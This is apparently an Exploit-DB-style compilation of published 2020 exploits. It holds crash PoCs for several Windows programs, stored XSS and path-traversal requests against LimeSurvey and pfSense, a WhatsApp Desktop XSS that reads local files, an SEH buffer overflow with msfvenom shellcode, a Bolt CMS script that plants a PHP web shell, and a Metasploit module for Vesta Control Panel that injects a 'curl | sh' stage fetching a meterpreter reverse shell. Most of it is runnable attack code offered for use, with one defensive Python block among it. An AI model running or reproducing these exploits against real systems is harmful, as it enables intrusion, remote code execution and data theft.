# Vulnerable Software: Frigate
# Version: 3.36
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)

# Steps to Produce the Crash:
# 1.- Run python code: crash.py
# 2.- Copy content to clipboard
# 3.- Open "Frigate3.exe"
# 4.- Go to "Disk" > Find Computer
# 5.- Paste ClipBoard into the "Computer Name:" field
# 6.- Click on OK
# 7.- Crashed

# Python "crash.py" Code:

buffer = "\x41" * 2000
f = open("Frigate.txt", "w")
f.write(buffer)
f.close()
-
Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
# and to provide security alerts. Nsauditor network auditor checks the enterprise network for all potential methods that
# a hacker might use to attack it and creates a report of the potential problems found. Nsauditor network auditing
# software significantly reduces the total cost of network management in enterprise environments by enabling
# IT personnel and systems administrators to gather a wide range of information from all the computers in the network without
# installing server-side applications on these computers, and creates a report of the potential problems that were found.

# PoC
# 1. Run the python script, it will create a new file "POC.txt"
# 2. Run Nsauditor and click on "Register -> Enter Registration Code"
# 3. Paste the content of POC.txt into the Field: 'Name'
# 4. Click 'ok'
# 5. Magic happen :)

#!/usr/bin/env python

buff = "\x41" * 500
buff += "\x41" * 500

try:
    f = open("POC.txt", "w")
    print "[+] Creating %s bytes payload.." % len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"
-
SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
# Exploit Author: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: https://www.spotauditor.com/
# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Version: 5.3.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3

# About App
# SpotAuditor is an advanced password recovery solution. The software recovers passwords of over 40 popular programs,
# including passwords saved in the Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook
# SMTP and POP passwords, Hotmail, Facebook, Gmail, Yahoo and Aol passwords, and the passwords of 20
# top FTP programs, and recovers saved passwords hidden behind asterisks on dialogs and web forms.

# PoC
# 1. Run the python script, it will create a new file "POC.txt"
# 2. Run SpotAuditor and click on "Register -> Enter Registration Code"
# 3. Paste the content of POC.txt into the Field: 'Name'
# 4. Click 'ok'
# 5. Magic happen :)

#!/usr/bin/env python

buff = "\x41" * 500
buff += "\x41" * 500

try:
    f = open("POC.txt", "w")
    print "[+] Creating %s bytes payload.." % len(buff)
    f.write(buff)
    f.close()
    print "[+] POC created!"
except:
    print "POC cannot be created"
-
LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11456

# Vulnerability Details
Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel.
Vulnerable Parameter : "title"

# POC

POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1
Host: TARGET
Content-Length: 374
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D
Connection: close

YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=
-
UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
# 2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
# 3.- Open UltraVNC Launcher
# 4.- Select "Properties"
# 5.- In "Password" Paste Clipboard
# 6.- Click on "OK"
# 7.- Click on "Properties"
# 8.- Crashed

cod = "\x41" * 300
f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
f.write(cod)
f.close()
-
Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Vesta Control Panel Authenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits command injection vulnerability in v-list-user-backups bash script file.
        Low privileged authenticated users can execute arbitrary commands under the context of the root user.

        An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
        During the user backup process, this file name will be evaluated by the v-user-backup bash scripts.
        As result of that backup process, when an attacker try to list existing backups injected payload will be executed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>'  # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
          ['CVE', '2020-10808']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 8083,
          'WfsDelay' => 300,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 17 2020",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8083),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with']),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )

    deregister_options('FTPUSER', 'FTPPASS')
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login
    #
    # This is very simple login process. Nothing important.
    # We will be using cookie and csrf_token across the module, so they are instance variables.
    #
    print_status('Retrieving cookie and csrf token values')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login', '/'),
    })

    if res && res.code == 200 && !res.get_cookies.empty?
      @cookie = res.get_cookies
      @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
      if @csrf_token.empty?
        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
      end
    else
      fail_with(Failure::Unknown, 'Something went wrong.')
    end
    print_good('Cookie and CSRF token values successfully retrieved')

    print_status('Authenticating to HTTP Service with given credentials')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login', '/'),
      'cookie' => @cookie,
      'vars_post' => {
        'token' => @csrf_token,
        'user' => username,
        'password' => password
      }
    })

    if res && res.code == 302 && !res.get_cookies.empty?
      print_good('Successfully authenticated to the HTTP Service')
      @cookie = res.get_cookies
    else
      fail_with(Failure::Unknown, 'Credentials are not valid.')
    end
  end

  def is_scheduled_backup_running
    res = trigger_scheduled_backup
    #
    # The schedule endpoint redirects to the backup list. Requesting that list
    # is what evaluates the implanted file name, so it is fetched here and the
    # "already running" notice tells us whether the backup job has finished.
    #
    if res && res.code == 302
      res = trigger_payload
      if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
        return true
      else
        print_good('It seems scheduled backup is done ..! Triggering payload <3')
        return false
      end
    else
      fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
    end
    return false
  end

  def trigger_payload
    res = send_request_cgi({
      'method' => 'GET',
      'cookie' => @cookie,
      'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
    })

    if res && res.code == 200
      res
    else
      fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
    end
  end

  def trigger_scheduled_backup
    res = send_request_cgi({
      'method' => 'GET',
      'cookie' => @cookie,
      'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
    })

    if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
      res
    else
      fail_with(Failure::Unknown, 'Something went wrong.')
    end
  end

  def payload_implant
    #
    # Our payload will be placed as a file name on FTP service.
    # Payload length can't be more than 255 and SPACE can't be used because of the
    # bug in the backend software. Due to these limitations, I used web delivery method.
    #
    # When the initial payload executed. It will execute very short perl command, which is going to fetch
    # actual python meterpreter first stager and execute it.
    #
    final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"

    # Yet another datastore variable overriding.
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    port_restore = datastore['RPORT']
    datastore['RPORT'] = 21
    datastore['FTPUSER'] = username
    datastore['FTPPASS'] = password

    #
    # Connecting to the FTP service with same creds as web ui.
    # Implanting the very first stage of payload as a empty file.
    #
    if (not connect_login)
      fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
    end
    print_good('Successfully authenticated to the FTP service')

    res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
    if res.nil?
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
    end
    print_good('Successfully uploaded the payload as a file name')
    disconnect

    # Revert datastore variables.
    datastore['RPORT'] = port_restore
    datastore['SSL'] = true if ssl_restore
  end

  def exploit
    start_http_server
    payload_implant
    login
    trigger_scheduled_backup
    print_good('Scheduled backup has been started. Exploitation may take up to 5 minutes.')
    while is_scheduled_backup_running == true
      print_status('It seems there is an active backup process ! Recheck after 30 seconds. Zzzzzz...')
      Rex.sleep(30)
    end
    stop_service
  end

  def on_request_uri(cli, request)
    print_good('First stage is executed ! Sending 2nd stage of the payload')
    second_stage = "python -c \"#{payload.encoded}\""
    send_response(cli, second_stage, {'Content-Type'=>'text/html'})
  end

  def start_http_server
    #
    # HttpClient and HttpServer use same SSL variable :(
    # We don't need a SSL for payload delivery.
    #
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end

    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})

    print_status("Second payload download URI is #{get_uri}")

    # We need that instance variable since get_uri keeps using SSL from datastore.
    # We have to get the URI before restoring the SSL.
    @second_stage_url = get_uri

    datastore['SSL'] = true if ssl_restore
  end
end
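The module description above pins the bug on a bash script that evaluates attacker-chosen file names. As an added example, written for this page rather than taken from the Metasploit module or from Vesta, a backup listing in Python that treats file names as data: names are enumerated with os.scandir, checked against a strict allowlist that excludes dotfiles, quotes and whitespace, and only ever handed to a subprocess as a single argv element. The fixture directory and every file name in it are constructed for the demo.

```python
import os
import re
import subprocess
import tempfile
from typing import List

# Allowlist for backup archive names: a letter, digit or underscore first,
# then a bounded run of name characters, then a .tar suffix. Leading dots,
# quotes, "$(" and whitespace (the ingredients of the v-list-user-backups
# injection) can never match, so a hostile name is simply not a backup.
BACKUP_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,200}\.tar$")


def is_safe_backup_name(name: str) -> bool:
    """True only for names that are safe to treat as an opaque archive name."""
    if name.startswith(".") or "/" in name or "\x00" in name:
        return False
    return BACKUP_NAME_RE.fullmatch(name) is not None


def list_user_backups(backup_dir: str) -> List[str]:
    """Enumerate a user's backup archives without involving a shell.

    os.scandir() hands names back as data; nothing here is ever interpolated
    into a command line, so a hostile name is skipped and reported rather
    than evaluated.
    """
    safe, rejected = [], []
    with os.scandir(backup_dir) as entries:
        for entry in entries:
            if not entry.is_file(follow_symlinks=False):
                continue
            if is_safe_backup_name(entry.name):
                safe.append(entry.name)
            else:
                rejected.append(entry.name)
    for bad in rejected:
        # repr() keeps control characters and quotes visible in the log line.
        print(f"[!] ignoring unexpected file in backup dir: {bad!r}")
    return sorted(safe)


def archive_size(backup_dir: str, name: str) -> int:
    """Size of one archive via an external tool, called with an argv list.

    Hypothetical helper showing the safe pattern when a subprocess is
    unavoidable: the name is validated first, and it reaches the child as
    one argv element that /bin/sh never parses.
    """
    if not is_safe_backup_name(name):
        raise ValueError(f"refusing to operate on {name!r}")
    out = subprocess.run(
        ["wc", "-c", os.path.join(backup_dir, name)],
        capture_output=True, text=True, check=True,
    ).stdout
    return int(out.split()[0])


def build_sample_backup_dir() -> str:
    """Constructed fixture: two real archives next to two names that must be rejected."""
    path = tempfile.mkdtemp(prefix="vesta_demo_")
    for fname, body in [
        ("user_2020-03-17.tar", b"tar-bytes"),
        ("x.tar", b"hello"),
        (".a';$(true);'", b""),  # dotfile carrying shell metacharacters (constructed)
        ("user 2.tar", b""),     # whitespace is not allowed either
    ]:
        with open(os.path.join(path, fname), "wb") as fh:
            fh.write(body)
    return path
```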
-
Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Date: 2020-04-04
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71"
buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62"
buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69"
buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62"
buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71"
buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73"
buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d"
buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f"
buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b"
buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a"
buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54"
buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f"
buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b"
buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x4d\x42\x4a\x49\x71\x62"
buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50"
buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46"
buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38"
buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d"
buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70"
buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52"
buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43"
buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f"
buf += b"\x75\x4d\x30\x41\x41"

# Every piece is kept as bytes so the file is written unchanged under
# Python 3 as well (the original mixed str and the bytes payload, which
# only works on Python 2).
nseh = b"\x71\x41"
seh = b"\x41\x4a"

alignment = b""
alignment += b"\x54\x71"      # push ebx, padding
alignment += b"\x58\x71"      # pop eax, padding
alignment += b"\x05\x20\x22"  # add eax, 0x22002000
alignment += b"\x71"          # Padding
alignment += b"\x2D\x19\x22"  # sub eax, 0x22001900
alignment += b"\x71"          # Padding
alignment += b"\x50\x71"      # push eax, padding
alignment += b"\xC3"          # retn

buffer = b"A" * 536 + nseh + seh + b"\x41\x71\x41\x71" + alignment + b"C" * 71 + buf + b"C" * 2000

with open("poc.m3l", "wb") as f:
    f.write(buffer)
-
ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
# 2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
# 3.- Open ZOC Terminal
# 4.- Select File > Create SSH Key Files...
# 5.- Select the "Private key file:" field, erase it and paste the clipboard
# 6.- Click on "Create public/private key files..."
# 7.- Crashed

buffer = "\x41" * 2000

with open("ZOC_7.25.5_PrivateKeyFile.txt", "w") as f:
    f.write(buffer)
-
UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
# 2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
# 3.- Open UltraVNC Viewer
# 4.- In "VNC Server" paste the clipboard
# 5.- Click on "Connect"
# 6.- Crashed

cod = "\x41" * 256

with open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w') as f:
    f.write(cod)
-
WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
# Date: 2020-01-21
# Exploit Author: Gal Weizman
# Vendor Homepage: https://www.whatsapp.com
# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
# Version: 0.3.9308
# Tested On: Mac OS, Windows, iPhone
# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426

// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
// step 2: open devtools and search in all files "t=e.id"
// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
// step 4: paste "https://example.com" in the text box and hit "Enter"
// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"

var payload = `(async function() {
    alert(navigator.userAgent);
    (async function() {
        // read "file:///C:/windows/system32/drivers/etc/hosts" content
        const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
        const t = await r.text();
        alert(t);
    }())
}())`;
payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
e.__x_matchedText = payload;
e.__x_body = `
Innocent text
${payload}
More Innocent text
`;

// step 6: press F8 in order for the execution to continue
// result: a message should be sent to the victim that once is clicked will execute the payload above
// further information: https://github.com/weizman/CVE-2019-18426
-
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day

#!/usr/bin/python
import requests
import sys
import re
from bs4 import BeautifulSoup
from colorama import init
from termcolor import colored

init()
#pip install -r requirements.txt

# The original prints a large block-character banner here; only its text is kept.
print(colored('''
Pre Auth rce with low credentials #Zero-way
By @r3m0t3nu11
special thanks to @dracula @Mr_Hex''', "blue"))

if len(sys.argv) != 4:
    print(len(sys.argv))
    print(colored("[~] Usage : ./bolt.py url username password", "red"))
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()

print(colored("[+] Retrieving CSRF token to submit the login form", "green"))
page = request.get(url + "/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")
login_info = {
    "user_login[username]": username,
    "user_login[password]": password,
    "user_login[login]": "",
    "user_login[_token]": token
}
login_request = request.post(url + "/bolt/login", login_info)
print(colored("[+] Login token is : {0}", "green").format(token))

# Store the PHP payload as the display name; it ends up serialized in the session file.
aaa = request.get(url + "/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = {
    "user_profile[password][first]": "password",
    "user_profile[password][second]": "password",
    "user_profile[email]": "a@a.com",
    "user_profile[displayname]": "<?php system($_GET['test']);?>",
    "user_profile[save]": "",
    "user_profile[_token]": token0
}
profile = request.post(url + '/bolt/profile', data_profile)

cache_csrf = request.get(url + "/bolt/overview/showcases")
soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")

asyncc = request.get(url + "/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_='entry disabled')

print(colored("[+] SESSION INJECTION ", "green"))
fileINJ = None
for all_tables in tables:
    with open("session.txt", "a+") as f:
        f.write(all_tables.text + "\n")
    num_lines = sum(1 for line in open('session.txt'))
    # Rename the session file out of the cache into the web root via the file manager.
    renamePostData = {
        "namespace": "root",
        "parent": "/app/cache/.sessions",
        "oldname": all_tables.text,
        "newname": "../../../public/files/test{}.php".format(num_lines),
        "token": csrf
    }
    rename = request.post(url + "/async/folder/rename", renamePostData)
    try:
        url1 = url + '/files/test{}.php?test=ls%20-la'.format(num_lines)
        rev = requests.get(url1).text
        r1 = re.findall('php', rev)
        r2 = r1[0]
        if r2 == "php":
            fileINJ = "test{}".format(num_lines)
            print(colored("[+] FOUND : " + fileINJ, "green"))
    except IndexError:
        print(colored("[-] Not found.", "red"))

# Without a reachable renamed session file there is nothing to talk to.
if fileINJ is None:
    print(colored("[-] No injected session file was found, exiting.", "red"))
    exit()

while True:
    inputs = input(colored("Enter OS command , for exit 'quit' : ", "green", "on_red"))
    if inputs == "quit":
        exit()
    a = requests.get(url + "/files/{}.php?test={}".format(fileINJ, inputs))
    aa = a.text
    r11 = re.findall(r'...displayname";s:..:"([\w\s\W]+)', aa)
    print(r11[0])
-
pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.pfsense.org
# Version: PfSense 2.4.4-P3
# Tested on: FreeBSD 11.2-RELEASE-p10
# CVE : CVE-2020-11457

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr

# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.

POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d

__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
-
LimeSurvey 4.1.11 - 'File Manager' Path Traversal
# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11455

# Vulnerability Details
# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
# that allows an attacker to download arbitrary files. The file manager functionality will also
# delete the file after it is downloaded (if the web service account has permissions to do so),
# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
# Vulnerable Parameter : "path"

# POC
https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
